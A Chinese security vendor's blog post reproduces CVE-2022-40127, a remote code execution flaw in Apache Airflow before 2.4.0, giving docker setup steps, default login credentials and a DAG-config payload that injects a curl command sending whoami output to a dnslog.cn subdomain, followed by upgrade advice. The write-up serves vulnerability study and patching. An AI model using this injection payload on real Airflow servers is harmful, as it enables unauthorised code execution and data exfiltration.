提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创

    申请试用
      CVE-2022-40127 Apache Airflow远程代码执行复现
      发布时间:2022-12-23 阅读次数: 540 次


      漏洞简介

      Airflow是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),airflow可以定义一组有依赖的任务,按照依赖依次执行。Apache Airflow的某些版本存在远程代码执行漏洞,如攻击者获取到Apache Airflow后台权限,则可在Apache Airflow应用服务器上执行任意代码。




      影响版本

      Apache Airflow < 2.4.0




      环境搭建

      可根据


      https://github.com/Mr-xn/CVE-2022-40127

      进行环境搭建

      如图所示,执行


      mkdir CVE-2022-40127 && cd CVE-2022-40127

      创建漏洞环境目录

      图片

      执行


      wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml

      拉取漏洞dockr环境文件

      图片

      执行


      mkdir -p ./dags ./logs ./plugins

      创建目录

      图片

      执行


      echo -e "AIRFLOW_UID=$(id -u)" > .env

      创建环境变量

      图片

      执行


      docker-compose up airflow-init

      拉取漏洞docker环境

      图片

      执行


      docker-compose up -d

      运行漏洞docker环境

      图片

      访问

      http://ip:8080

      出现以下页面代表环境创建成功

      图片




      漏洞复现

      复现该漏洞需登录airflow应用

      如图所示,通过airflow/airflow

      登录应用

      图片

      点击右小箭头再点击Trigger DAG w/ config

      图片

      如图所示,访问


      http://dnslog.cn/

      点击Get SubDomain

      获取到域名


      2gbu0x.dnslog.cn

      图片

      返回airflow应用页面,如图所示,在红框内输入POC


      {"fxoxx":"\";curl `whoami`.2gbu0x.dnslog.cn;\""}

      并点击Trigger

      图片

      返回dnslog页面,点击Refresh Record即可成功获得代码命令结果

      图片




      漏洞修复

      将Apache Airflow版本升级至大于2.4.0版本。


      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部